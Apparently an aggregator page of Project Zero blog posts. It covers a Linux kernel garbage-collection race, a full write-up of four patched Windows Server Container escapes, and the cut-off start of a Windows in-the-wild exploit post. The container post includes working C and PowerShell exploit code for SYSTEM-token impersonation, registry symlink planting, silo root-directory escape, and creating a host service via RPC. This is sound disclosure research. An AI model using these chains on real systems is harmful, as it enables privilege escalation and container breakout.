In 2017, Andrey Ulanov from Google found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)
        if (s) {
                struct unix_sock *u = unix_sk(s);

+               BUG_ON(!atomic_long_read(&u->inflight));
                BUG_ON(list_empty(&u->link));

                if (atomic_long_dec_and_test(&u->inflight))
At first glance, it seems that the BUG_ON could prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage, it can evade the BUG_ON check via heap spray.

New Garbage Collection Discovered in 2021

CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window.


Part I Conclusion

To recap, we have discussed the kernel internals of SCM_RIGHTS and the design and implementation of the Linux kernel garbage collector. We have also analyzed the behavior of the MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF through a subtle and arcane race condition.

The bug was publicly spotted in 2016, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actor who saw the public email thread could have developed an LPE exploit against the Linux kernel.

In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.


Who Contains the Containers?

Published: 2021-04-01 16:06:00

Popularity: 9

Author: Ryan

Posted by James Forshaw, Project Zero

This is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you’re researching this area.

Windows Containers Background

Windows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on MSDN. I’m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.

The primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of Job object, which can be assigned to a process.

The application running in the container, as far as possible, will believe it’s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden.

For example, the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization, and the application shouldn’t be able to tell the difference. Containers shouldn’t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.

Realistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there’s also some potential security benefit to running inside a container, as the application shouldn’t be able to directly interact with other processes and resources on the host.

There are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.

Hyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you’re still constrained by the VM and hypervisor. To fully escape and access the host you’d need a separate VM escape as well.

The current MSRC security servicing criteria states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn’t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.

As Windows Server Containers are not a security boundary any bugs in the feature won’t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.

Origins of the Research

Over a year ago I was asked for some advice by Daniel Prizmant, a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel’s blog post for more in-depth information about Windows containers.

Knowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second blog post, this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.

The global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done more easily without injection: you could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on Github.
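For the curious, the in-process approach boils down to duplicating a SYSTEM token and applying it to the current thread. The PoC itself is PowerShell, but a rough C equivalent might look like the following hedged sketch (finding a SYSTEM process ID and error handling are omitted, and it assumes the caller holds SeImpersonatePrivilege or equivalent):

#include <windows.h>

/* Hypothetical sketch: impersonate the token of a SYSTEM process
 * identified by system_pid on the current thread. */
static BOOL impersonate_system(DWORD system_pid)
{
        HANDLE proc, token, dup;
        BOOL ok = FALSE;

        proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, system_pid);
        if (!proc)
                return FALSE;
        if (OpenProcessToken(proc, TOKEN_DUPLICATE | TOKEN_QUERY, &token)) {
                /* Make an impersonation copy and put it on this thread. */
                if (DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL,
                                     SecurityImpersonation,
                                     TokenImpersonation, &dup)) {
                        ok = SetThreadToken(NULL, dup);
                        CloseHandle(dup);
                }
                CloseHandle(token);
        }
        CloseHandle(proc);
        return ok;
}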

Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found, it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker, which takes the MS-provided Go wrapper and implements the more familiar Docker CLI. While there are likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so it would be in scope. Note, there are two versions of Docker: Enterprise, which is only for server systems, and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2
USER ContainerUser
COPY NtObjectManager c:/NtObjectManager
CMD [ "powershell", "-noexit", "-command", \
  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .
Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2
 ---> b29adf5cd4f0
Step 2/4 : USER ContainerUser
 ---> Running in ac03df015872
Removing intermediate container ac03df015872
 ---> 31b9978b5f34
Step 3/4 : COPY NtObjectManager c:/NtObjectManager
 ---> fa42b3e6a37f
Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]
 ---> Running in 86cad2271d38
Removing intermediate container 86cad2271d38
 ---> e7d150417261
Successfully built e7d150417261
Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image
PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

USER INFORMATION
----------------
Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION
---------------------
Name                                   Attributes
----                                   ----------
Mandatory Label\High Mandatory Level   Integrity, ...
Everyone                               Mandatory, ...
BUILTIN\Users                          Mandatory, ...
NT AUTHORITY\SERVICE                   Mandatory, ...
CONSOLE LOGON                          Mandatory, ...
NT AUTHORITY\Authenticated Users       Mandatory, ...
NT AUTHORITY\This Organization         Mandatory, ...
NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...
LOCAL                                  Mandatory, ...
User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION
---------------------
Name                          Luid              Enabled
----                          ----              -------
SeChangeNotifyPrivilege       00000000-00000017 True
SeImpersonatePrivilege        00000000-0000001D True
SeCreateGlobalPrivilege       00000000-0000001E True
SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting; however, looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system, including administrators. MSRC considers SeImpersonatePrivilege to be administrator-equivalent, meaning if you have it you can assume you can get to administrator. It seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

Next, I used the NtObject drive provider to list the object manager namespace. For example, checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName
----                                              --------
Ip                                                SymbolicLink
Tcp6                                              SymbolicLink
Http                                              Directory
Ip6                                               SymbolicLink
ahcache                                           SymbolicLink
WMIDataDevice                                     SymbolicLink
LanmanDatagramReceiver                            SymbolicLink
Tcp                                               SymbolicLink
LanmanRedirector                                  SymbolicLink
DxgKrnl                                           SymbolicLink
ConDrv                                            SymbolicLink
Null                                              SymbolicLink
MailslotRedirector                                SymbolicLink
NamedPipe                                         Device
Udp6                                              SymbolicLink
VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink
KsecDD                                            SymbolicLink
DeviceApi                                         SymbolicLink
MountPointManager                                 Device
...

Interestingly, most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects, but there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There are likely some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name

Name
----
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Clients
HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
HKEY_LOCAL_MACHINE\SOFTWARE\ODBC
HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH
HKEY_LOCAL_MACHINE\SOFTWARE\Policies
HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications
HKEY_LOCAL_MACHINE\SOFTWARE\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name

Name
----
Classes
Clients
DefaultUserEnvironment
Docker Inc.
Intel
Macromedia
Microsoft
ODBC
OEM
OpenSSH
Partner
Policies
RegisteredApplications
Windows
WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name

Name
----
.DEFAULT
S-1-5-19
S-1-5-20
S-1-5-21-426062036-3400565534-2975477557-1001
S-1-5-21-426062036-3400565534-2975477557-1001_Classes
S-1-5-21-426062036-3400565534-2975477557-1003
S-1-5-18

PS> Get-NtSid

Name                       Sid
----                       ---
User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.
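To make the difference concrete, here is a hedged C sketch of the relative-open style using the native API (the NtOpenKey prototype is declared by hand since winternl.h doesn't expose it; inside the container, this kind of relative open reached the host's real hive while an absolute open of the same path hit the overlay):

#include <windows.h>
#include <winternl.h>

#ifndef NT_SUCCESS
#define NT_SUCCESS(s) (((NTSTATUS)(s)) >= 0)
#endif

NTSYSAPI NTSTATUS NTAPI NtOpenKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess,
                                  POBJECT_ATTRIBUTES ObjectAttributes);

static HANDLE open_software_hive_relative(void)
{
        UNICODE_STRING root_name, sub_name;
        OBJECT_ATTRIBUTES oa;
        HANDLE root, key = NULL;

        /* Open \REGISTRY itself first... */
        RtlInitUnicodeString(&root_name, L"\\REGISTRY");
        InitializeObjectAttributes(&oa, &root_name, OBJ_CASE_INSENSITIVE,
                                   NULL, NULL);
        if (!NT_SUCCESS(NtOpenKey(&root, KEY_READ, &oa)))
                return NULL;

        /* ...then open MACHINE\SOFTWARE relative to that handle. In the
         * container this bypassed the registry overlay and returned the
         * host's real SOFTWARE hive. */
        RtlInitUnicodeString(&sub_name, L"MACHINE\\SOFTWARE");
        InitializeObjectAttributes(&oa, &sub_name, OBJ_CASE_INSENSITIVE,
                                   root, NULL);
        NtOpenKey(&key, KEY_READ, &oa);
        NtClose(root);
        return key;
}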

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state; unfortunately you’d be wrong. The following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {
  if (PsIsCurrentThreadInServerSilo()
    || !TargetHive
    || TargetHive == SourceHive) {
    return TRUE;
  }

  if (SourceHive->Flags.Trusted)
    return FALSE;

  // Check trust list.
}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives; the check for the trusted state of the source hive only happens after this initial check, so it is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted, so a symbolic link in an overlay would not be followed to the trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized it needed to be removed when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k’s support for FlickInfo configuration (which seems to be related in some way to touch input, but isn’t documented). When setting the configuration, Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive, allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue, but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use the registry silo escape to write to the host registry.
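
For background, creating the registry symbolic link itself is a well-known, unprivileged operation; it’s the hive-crossing check in CmpOKToFollowLink that normally limits where the link can point. The following is a minimal sketch, not the exploit’s actual code, of planting such a link with the native API; the key path and target below are hypothetical placeholders, and <SID> must be replaced with the caller’s SID.

/* Minimal sketch: plant a registry symbolic link from user mode.
   Key path and target are hypothetical placeholders. */
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

#ifndef OBJ_CASE_INSENSITIVE
#define OBJ_CASE_INSENSITIVE 0x00000040
#endif
#ifndef NT_SUCCESS
#define NT_SUCCESS(s) (((NTSTATUS)(s)) >= 0)
#endif

typedef NTSTATUS(NTAPI *NtCreateKey_t)(PHANDLE, ACCESS_MASK,
                                       POBJECT_ATTRIBUTES, ULONG,
                                       PUNICODE_STRING, ULONG, PULONG);
typedef NTSTATUS(NTAPI *NtSetValueKey_t)(HANDLE, PUNICODE_STRING, ULONG,
                                         ULONG, PVOID, ULONG);

int main(void) {
  HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
  NtCreateKey_t pNtCreateKey =
      (NtCreateKey_t)GetProcAddress(ntdll, "NtCreateKey");
  NtSetValueKey_t pNtSetValueKey =
      (NtSetValueKey_t)GetProcAddress(ntdll, "NtSetValueKey");

  UNICODE_STRING name, value_name;
  /* Hypothetical link key in the user's hive. */
  RtlInitUnicodeString(&name, L"\\Registry\\User\\<SID>\\Software\\LinkDemo");
  RtlInitUnicodeString(&value_name, L"SymbolicLinkValue");
  WCHAR target[] = L"\\Registry\\Machine\\Software\\Demo"; /* hypothetical */

  OBJECT_ATTRIBUTES attr;
  InitializeObjectAttributes(&attr, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);

  HANDLE key;
  NTSTATUS status =
      pNtCreateKey(&key, KEY_ALL_ACCESS, &attr, 0, NULL,
                   REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK, NULL);
  if (NT_SUCCESS(status)) {
    /* The link target is stored as a REG_LINK value with no terminating NUL. */
    pNtSetValueKey(key, &value_name, 0, REG_LINK, target,
                   sizeof(target) - sizeof(WCHAR));
    NtClose(key);
  }
  return 0;
}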

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {
  if (Silo) {
    PPSP_STORAGE Storage = Silo->Storage;
    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];
    if (Slot->Present)
      return Slot->Value;
  }
  return ObpRootDirectoryObject;
}

We can see that the function extracts a storage parameter from the passed-in silo; if the slot is present, it returns the slot’s value. If the silo is NULL or the slot isn’t present, the global root directory stored in ObpRootDirectoryObject is returned. When a server silo is set up, the slot is populated with a new root directory, so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine: if a server silo is passed in, it should always return the silo’s root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough; there are only two callers, and they both contain the following code.

PEJOB silo = PsGetCurrentSilo();
Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {
  PETHREAD Thread = PsGetCurrentThread();
  PEJOB silo = Thread->Silo;
  if (silo == (PEJOB)-3) {
    silo = Thread->Tcb.Process->Job;
    while (silo) {
      if (silo->JobFlags & EJOB_SILO) {
        break;
      }
      silo = silo->ParentJob;
    }
  }
  return silo;
}

A silo can be associated with a thread through impersonation, or it can be one of the jobs in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches the process’s job hierarchy for anything which has the EJOB_SILO flag set. If a silo is found, it’s returned from the function; otherwise NULL is returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo: application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore, to trick the object manager into using the real root directory, all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability, but it requires no administrator privileges to function. Again, as with the registry issue, you’re still limited in what you can modify outside of the container based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"
PS> $root.FullPath
\
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> $root.FullPath
\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory, the kernel makes it look like one by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code from trying to create a root directory, which we don’t want and which can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the real root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues to escape the container completely from ContainerUser. First, get hold of an administrator token through something like RogueWinRM; you can then impersonate it thanks to SeImpersonatePrivilege. Then use the object manager root directory issue to access the host’s service control manager (SCM) over its ALPC port and create a new service. You don’t even need to copy an executable outside the container, as the container’s system volume is an accessible device on the host which we can just reference.

As far as the host’s SCM is concerned you’re an administrator, so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run on the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is that the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service, you will end up accessing the container’s SCM, not the host’s.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()
PS> $sym_path = "$env:SystemDrive\symbols"
PS> mkdir $sym_path | Out-Null
PS> $services_path = "$env:SystemRoot\system32\services.exe"
PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'
# You can also use the following to run a container based executable.
#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {
#   "\\.\GLOBALROOT" + $f.FullPath
#}
PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path
PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path |
   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'
PS> $client = Get-RpcClient $rpc
PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory
PS> Set-NtProcessJob $silo -Current
PS> Connect-RpcClient $client -EndpointPath ntsvcs
PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `
 [NullString]::Value, `
 [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)
PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `
 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `
 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)
PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work, it’s expected that you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container, the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed; however, as already mentioned, the MSRC servicing criteria state that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue it was something which would allow privilege escalation inside a container from a non-administrator. This fit within the scope of a normal bug I’d find in Windows; it just required a special environment to function. This was issue 2120, which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward: the call to PsIsCurrentThreadInServerSilo was removed, as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated, as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try to find mitigating controls, or stop using Windows Server Containers for anything where untrusted code could ever run.

After much back and forth with various people in MSRC, a decision was made. If a container escape works from a non-administrator user (basically, if you can access resources outside of the container), then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible, as it required SeTcbPrivilege, which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed, I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then such a container probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interaction with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios; this is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle, and Hyper-V is at least a supported security boundary. However, container escapes are still useful, as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.


In-the-Wild Series: Windows Exploits

Published: 2021-01-12 17:37:00

Popularity: 48

Author: Ryan


This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

